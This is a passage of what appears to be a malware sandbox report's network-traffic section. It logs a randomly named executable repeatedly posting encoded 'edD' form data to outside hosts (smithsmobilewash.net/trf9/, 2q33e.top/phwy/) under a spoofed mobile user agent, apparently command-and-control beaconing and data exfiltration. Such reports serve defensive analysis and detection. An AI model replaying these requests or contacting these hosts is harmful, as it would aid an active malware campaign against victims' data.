                                                                                                                                Oct 29, 2024 16:56:59.095247030 CET702OUTPOST /trf9/ HTTP/1.1
                                                                                                                                Host: www.smithsmobilewash.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.smithsmobilewash.net
                                                                                                                                Referer: http://www.smithsmobilewash.net/trf9/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 66 56 65 49 42 4f 57 6f 2f 4f 4d 4a 77 39 31 4d 71 62 63 52 65 43 68 72 6e 65 51 6c 4b 5a 4e 78 47 44 47 49 64 73 59 39 41 46 4e 47 51 65 62 33 33 38 42 69 32 44 32 61 65 36 46 62 5a 63 4f 6d 74 6c 70 4f 79 54 65 44 66 43 44 48 5a 30 49 35 61 37 38 32 35 7a 57 62 33 59 50 4b 38 66 74 56 36 4d 70 6d 6b 68 4c 7a 4b 78 48 65 59 53 6d 77 4f 75 30 78 59 4d 56 2f 71 4b 58 42 55 6e 6c 36 73 6b 6a 51 4d 6e 4b 43 2b 34 49 69 59 58 7a 30 51 57 65 31 75 76 53 67 5a 64 30 72 49 63 53 43 33 34 54 55 6a 6f 4f 41 6f 53 58 59 66 78 39 70 41 6e 59 78 2f 63 42 32 64 6a 68 79 58 6b 64 35 2f 75 49 30 73 43 51 3d
                                                                                                                                Data Ascii: edD=fVeIBOWo/OMJw91MqbcReChrneQlKZNxGDGIdsY9AFNGQeb338Bi2D2ae6FbZcOmtlpOyTeDfCDHZ0I5a7825zWb3YPK8ftV6MpmkhLzKxHeYSmwOu0xYMV/qKXBUnl6skjQMnKC+4IiYXz0QWe1uvSgZd0rIcSC34TUjoOAoSXYfx9pAnYx/cB2djhyXkd5/uI0sCQ=


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                46192.168.2.8497543.33.130.190805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:01.641539097 CET722OUTPOST /trf9/ HTTP/1.1
                                                                                                                                Host: www.smithsmobilewash.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.smithsmobilewash.net
                                                                                                                                Referer: http://www.smithsmobilewash.net/trf9/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 66 56 65 49 42 4f 57 6f 2f 4f 4d 4a 2f 38 6c 4d 6f 36 63 52 50 53 68 6f 74 2b 51 6c 63 70 4e 39 47 44 61 49 64 6f 49 54 42 77 56 47 58 2b 72 33 77 35 31 69 34 6a 32 61 56 61 46 53 57 38 50 6b 74 6c 6c 38 79 57 2b 44 66 43 48 48 5a 31 59 35 5a 4b 38 78 37 6a 57 4f 36 34 50 4d 79 2f 74 56 36 4d 70 6d 6b 68 65 57 4b 78 66 65 62 6a 57 77 4f 4b 59 2b 47 38 56 38 74 4b 58 42 48 33 6c 2b 73 6b 69 44 4d 6c 7a 76 2b 2b 4d 69 59 54 2f 30 52 48 65 71 6b 76 53 69 64 64 31 50 59 5a 37 54 32 61 61 79 6d 75 65 6c 78 67 6e 65 54 6e 4d 44 61 46 51 33 38 63 70 64 64 67 4a 45 53 54 41 52 6c 4e 59 45 79 56 48 2f 71 74 79 4c 4a 48 56 47 63 43 4b 54 50 30 50 35 72 55 46 42
                                                                                                                                Data Ascii: edD=fVeIBOWo/OMJ/8lMo6cRPShot+QlcpN9GDaIdoITBwVGX+r3w51i4j2aVaFSW8Pktll8yW+DfCHHZ1Y5ZK8x7jWO64PMy/tV6MpmkheWKxfebjWwOKY+G8V8tKXBH3l+skiDMlzv++MiYT/0RHeqkvSidd1PYZ7T2aaymuelxgneTnMDaFQ38cpddgJESTARlNYEyVH/qtyLJHVGcCKTP0P5rUFB


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                47192.168.2.8497553.33.130.190805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:04.194065094 CET1739OUTPOST /trf9/ HTTP/1.1
                                                                                                                                Host: www.smithsmobilewash.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.smithsmobilewash.net
                                                                                                                                Referer: http://www.smithsmobilewash.net/trf9/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 66 56 65 49 42 4f 57 6f 2f 4f 4d 4a 2f 38 6c 4d 6f 36 63 52 50 53 68 6f 74 2b 51 6c 63 70 4e 39 47 44 61 49 64 6f 49 54 42 77 64 47 58 4e 6a 33 32 65 5a 69 37 6a 32 61 4a 71 46 66 57 38 4f 38 74 6c 39 34 79 57 79 54 66 41 76 48 59 56 45 35 52 59 45 78 68 7a 57 4f 6d 49 50 4e 38 66 74 41 36 4d 34 4f 6b 68 4f 57 4b 78 66 65 62 68 4f 77 4a 65 30 2b 45 38 56 2f 71 4b 57 56 55 6e 6c 53 73 6b 36 54 4d 6a 76 5a 2b 75 73 69 62 33 54 30 53 78 79 71 6f 76 53 6b 61 64 31 58 59 5a 2b 4c 32 5a 76 4c 6d 75 43 62 78 6a 33 65 54 68 51 59 65 45 59 4a 6d 73 4e 78 55 58 4e 4a 62 54 4d 71 6e 38 51 52 31 31 4c 37 6e 61 66 6b 66 56 45 4e 57 30 37 2f 4e 44 50 52 72 69 4d 51 36 75 64 62 62 77 5a 32 6c 45 76 69 77 78 70 7a 50 79 51 59 61 6c 48 34 58 65 47 43 48 39 42 50 49 2f 36 6c 38 76 74 56 72 31 6b 71 78 49 48 39 65 51 75 38 41 39 75 33 73 49 39 55 6d 77 33 69 30 35 31 50 6e 4f 70 50 65 51 6d 6a 55 77 72 74 62 77 73 50 53 43 50 65 4d 74 30 6c 33 65 57 43 6e 45 48 49 6b 71 70 6b 2f 46 4b 6a 78 6e 44 4a 56 65 [TRUNCATED]
                                                                                                                                Data Ascii: edD=fVeIBOWo/OMJ/8lMo6cRPShot+QlcpN9GDaIdoITBwdGXNj32eZi7j2aJqFfW8O8tl94yWyTfAvHYVE5RYExhzWOmIPN8ftA6M4OkhOWKxfebhOwJe0+E8V/qKWVUnlSsk6TMjvZ+usib3T0SxyqovSkad1XYZ+L2ZvLmuCbxj3eThQYeEYJmsNxUXNJbTMqn8QR11L7nafkfVENW07/NDPRriMQ6udbbwZ2lEviwxpzPyQYalH4XeGCH9BPI/6l8vtVr1kqxIH9eQu8A9u3sI9Umw3i051PnOpPeQmjUwrtbwsPSCPeMt0l3eWCnEHIkqpk/FKjxnDJVe6kw3dBnvBp0KOn9CSQcyzdszk5IwQNWoBZWFGXi5jrcFADEmLV1IzYNzP+1uHTkFawUJVMsTup281ftuJTYT/bUHNlzikZ0KdUy9VinKCvKzc63IZuOH8QmW6wZHh93TW0y5bxgt07NGdGJhBeq9tiVaVJe6K6Excn8LS77ZLVPE5GIxys+auJqrfGTz0iGPT0nBRLF5zLWVLB1OJB3PjeA5r+u1ASvbkSKVRr696ga7b5a0wPSbPgF+Ef7gZzhEbD327CFMxQ3j0Boqj4EAwwBKJ1KXYy9Iu24gq9Vqx8oAkm1HfrZ78lHrq+ygHFw79KWcDhyinpmQX0Im011KzOH6ZknhN19/q3PqadocQoTujD/0RD84hOHPu8wWk4tCrytRWCkvNvmnexV/YE1dA4YxkpnEpFY4BsbdQBiX1kv3Mm3xbUkg8o9vBhgk7Wv837NNe/CSW5qP1Y6FbT5U89sGNTpUtIisXafHJDBQTC2xhRSBhTn6KXZavHHFSmQi0l0uJnneyQxhwIJ1UwoRYh4rR73c4qKzWF99t51BZTz9CgsT6TWl7ijx54U0j/FHm2paZr5gaAtvyB/zwLvRUC7wyz/xMZlUl8M4zxS1UEEKmrcYdl2glB2K9ZvDxyQOFyGMGc/88vWAvD0YeILF2nHttscD8MCxYq [TRUNCATED]


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                48192.168.2.8497563.33.130.190805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:06.729289055 CET435OUTGET /trf9/?edD=SX2oC5m45uYB1tV1xPAlHQ9pkf41HJggIgPCWZhvHUcjHM/w8Nd3jQ2tXPB/QOacw2gE0ne7LAGFXkFnbZ4l5ULW4r3r0ogn7NokvyLyFgbvViqVA80wJ4db34DSXGAE4g==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.smithsmobilewash.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:57:07.339656115 CET412INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Tue, 29 Oct 2024 15:57:07 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 272
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 64 44 3d 53 58 32 6f 43 35 6d 34 35 75 59 42 31 74 56 31 78 50 41 6c 48 51 39 70 6b 66 34 31 48 4a 67 67 49 67 50 43 57 5a 68 76 48 55 63 6a 48 4d 2f 77 38 4e 64 33 6a 51 32 74 58 50 42 2f 51 4f 61 63 77 32 67 45 30 6e 65 37 4c 41 47 46 58 6b 46 6e 62 5a 34 6c 35 55 4c 57 34 72 33 72 30 6f 67 6e 37 4e 6f 6b 76 79 4c 79 46 67 62 76 56 69 71 56 41 38 30 77 4a 34 64 62 33 34 44 53 58 47 41 45 34 67 3d 3d 26 6d 52 52 3d 56 78 75 64 66 30 66 48 7a 4c 77 38 34 6e 33 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?edD=SX2oC5m45uYB1tV1xPAlHQ9pkf41HJggIgPCWZhvHUcjHM/w8Nd3jQ2tXPB/QOacw2gE0ne7LAGFXkFnbZ4l5ULW4r3r0ogn7NokvyLyFgbvViqVA80wJ4db34DSXGAE4g==&mRR=Vxudf0fHzLw84n3P"}</script></head></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                49192.168.2.84975738.47.233.52805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:13.112205982 CET669OUTPOST /phwy/ HTTP/1.1
                                                                                                                                Host: www.2q33e.top
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2q33e.top
                                                                                                                                Referer: http://www.2q33e.top/phwy/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 41 4d 34 76 7a 73 53 69 65 4c 49 74 32 51 34 48 64 66 37 52 63 31 58 76 55 43 73 32 49 72 4d 44 6c 75 54 6a 69 71 73 73 6b 51 66 56 7a 62 59 45 61 6c 67 4f 48 4c 79 76 36 35 6f 69 33 58 59 68 53 38 33 33 48 44 64 2b 36 70 49 48 7a 64 61 39 77 34 6b 4a 73 4a 41 6f 54 31 71 33 46 35 76 76 6e 36 76 65 32 68 71 2b 74 37 37 4b 61 55 63 4e 59 6a 57 51 58 37 6a 2f 61 51 64 61 34 68 65 78 39 35 63 6e 7a 2b 53 44 54 53 4e 4f 79 59 65 39 43 4a 6a 4c 6c 4c 33 48 70 51 71 4d 66 36 78 76 71 44 78 64 48 77 59 4b 54 31 4f 48 44 4c 33 73 61 51 2f 75 4a 58 35 52 43 54 33 6c 69 4c 76 6d 36 36 50 48 62 56 41 3d
                                                                                                                                Data Ascii: edD=AM4vzsSieLIt2Q4Hdf7Rc1XvUCs2IrMDluTjiqsskQfVzbYEalgOHLyv65oi3XYhS833HDd+6pIHzda9w4kJsJAoT1q3F5vvn6ve2hq+t77KaUcNYjWQX7j/aQda4hex95cnz+SDTSNOyYe9CJjLlL3HpQqMf6xvqDxdHwYKT1OHDL3saQ/uJX5RCT3liLvm66PHbVA=
                                                                                                                                Oct 29, 2024 16:57:14.102221966 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:57:13 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                50192.168.2.84975838.47.233.52805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:15.656974077 CET689OUTPOST /phwy/ HTTP/1.1
                                                                                                                                Host: www.2q33e.top
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2q33e.top
                                                                                                                                Referer: http://www.2q33e.top/phwy/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 41 4d 34 76 7a 73 53 69 65 4c 49 74 77 44 51 48 66 2b 37 52 4a 46 58 73 4b 79 73 32 54 62 4d 59 6c 75 66 6a 69 70 68 7a 6b 43 72 56 7a 35 51 45 62 68 30 4f 41 4c 79 76 76 4a 70 6d 34 33 5a 4d 53 38 72 2f 48 43 68 2b 36 70 63 48 7a 59 32 39 7a 4a 6b 49 73 5a 41 75 49 6c 71 78 49 5a 76 76 6e 36 76 65 32 67 4f 59 74 36 54 4b 62 6b 4d 4e 4b 57 32 52 65 62 6a 38 64 51 64 61 38 68 65 31 39 35 63 2f 7a 36 79 36 54 51 31 4f 79 64 36 39 46 62 4c 4b 73 4c 33 42 6a 77 72 4a 4f 6f 59 58 76 78 39 59 45 67 51 33 51 44 53 6e 43 39 47 47 41 79 33 6f 4b 58 52 36 43 51 66 54 6e 38 79 4f 67 5a 66 33 46 43 57 39 6f 37 65 6f 4a 44 2f 61 43 42 58 6f 75 6a 4c 65 39 69 62 63
                                                                                                                                Data Ascii: edD=AM4vzsSieLItwDQHf+7RJFXsKys2TbMYlufjiphzkCrVz5QEbh0OALyvvJpm43ZMS8r/HCh+6pcHzY29zJkIsZAuIlqxIZvvn6ve2gOYt6TKbkMNKW2Rebj8dQda8he195c/z6y6TQ1Oyd69FbLKsL3BjwrJOoYXvx9YEgQ3QDSnC9GGAy3oKXR6CQfTn8yOgZf3FCW9o7eoJD/aCBXoujLe9ibc
                                                                                                                                Oct 29, 2024 16:57:16.606427908 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:57:16 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                51192.168.2.84975938.47.233.52805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:18.202681065 CET1706OUTPOST /phwy/ HTTP/1.1
                                                                                                                                Host: www.2q33e.top
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2q33e.top
                                                                                                                                Referer: http://www.2q33e.top/phwy/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 41 4d 34 76 7a 73 53 69 65 4c 49 74 77 44 51 48 66 2b 37 52 4a 46 58 73 4b 79 73 32 54 62 4d 59 6c 75 66 6a 69 70 68 7a 6b 43 54 56 7a 72 6f 45 62 41 30 4f 42 4c 79 76 7a 5a 70 72 34 33 5a 30 53 38 6a 7a 48 43 74 45 36 72 6b 48 79 2b 69 39 6e 72 41 49 2f 35 41 75 58 31 71 77 46 35 76 36 6e 36 2f 61 32 68 2b 59 74 36 54 4b 62 68 49 4e 64 54 57 52 59 62 6a 2f 61 51 64 6f 34 68 66 53 39 34 30 46 7a 38 75 31 54 6a 39 4f 79 39 71 39 44 6f 6a 4b 78 37 33 44 67 77 72 76 4f 6f 45 49 76 78 68 2b 45 68 55 5a 51 45 2b 6e 43 4c 50 50 56 57 47 33 62 6b 31 33 62 43 6a 43 70 65 6d 44 6f 70 6a 66 59 44 2b 63 2b 4d 6e 4a 63 52 7a 54 57 77 4f 57 34 31 66 4b 7a 6b 6a 64 46 6e 4d 49 61 2f 68 41 35 79 43 4f 43 30 64 77 6a 51 32 57 78 32 6b 59 77 44 33 4d 36 35 39 4a 49 63 56 7a 66 56 5a 32 2f 51 4f 4d 49 6e 75 53 39 66 6e 41 6e 48 7a 4e 66 36 6f 64 48 7a 4b 44 70 78 65 57 44 37 4d 77 53 32 57 6e 4d 4b 72 71 51 54 64 54 62 47 73 39 4f 68 6d 57 50 62 48 54 5a 6a 51 47 31 57 71 66 6e 71 55 70 59 69 4d 49 64 4b [TRUNCATED]
                                                                                                                                Data Ascii: edD=AM4vzsSieLItwDQHf+7RJFXsKys2TbMYlufjiphzkCTVzroEbA0OBLyvzZpr43Z0S8jzHCtE6rkHy+i9nrAI/5AuX1qwF5v6n6/a2h+Yt6TKbhINdTWRYbj/aQdo4hfS940Fz8u1Tj9Oy9q9DojKx73DgwrvOoEIvxh+EhUZQE+nCLPPVWG3bk13bCjCpemDopjfYD+c+MnJcRzTWwOW41fKzkjdFnMIa/hA5yCOC0dwjQ2Wx2kYwD3M659JIcVzfVZ2/QOMInuS9fnAnHzNf6odHzKDpxeWD7MwS2WnMKrqQTdTbGs9OhmWPbHTZjQG1WqfnqUpYiMIdKWnWE6pHuy2l8/Ao86X3+NrzzwLB6Eb70iVFgL5DmEgJZnG4fgNaY+i79yPADomj3X9mR/WhyyCi8nBcG3NpG9BmD2n0I4QFJzqrHBz6Cr9cFpwpzFURFLv/7EdQ/5zjmsuBSjNj47S8LTCvCBEdTCeBWa3jWTnI0qE0wfMJBz00nOaCJnt23wBeZGvP9Z0HTiKDVogEzUb1rlZPTAOO/Tf5iDyojwVyCB9W5+e7ur5N/voLqMKc3hzRsS0q2CzFP3jMBzVZrE7kmGcNkV3mm3MV2uQw+VSQ5H0OrDj/z0vJIILAq6EmiVtxnYsJcKB6QDH6ePA7Qz0EedCAQJkckcG8zzEQuu/ACrqGqBJZYJNw6pCl4sz4dYaJ92Svfv5QGC1G1Q37OHIcuy2XUAzAjhq8B83jWYuVsd2dmece4hYLgJEi6dzzs72INIiN40ek1IhDgMJVZvMkHvXmPdK6ifpe6GotK/HMQrWUx2h6PW0Ikrl7Z5OkgHeAjUNKIJI4zEbK4cD/T7ugNdsppd9si1v6tyfcCCDFwOFomNV2gPIzniFNRQxkLDGf3q9q7DhPEvyCmYwU0snfMvMEOrFZqtplE6sDaga6vXZ2DmF89Gzyg0EmT6+4SKCsO8e9LHriyLmIcNtlO9Lun0LJ37AOAIqm1qU8fRjhGqp [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:57:19.216146946 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:57:19 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                52192.168.2.84976038.47.233.52805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
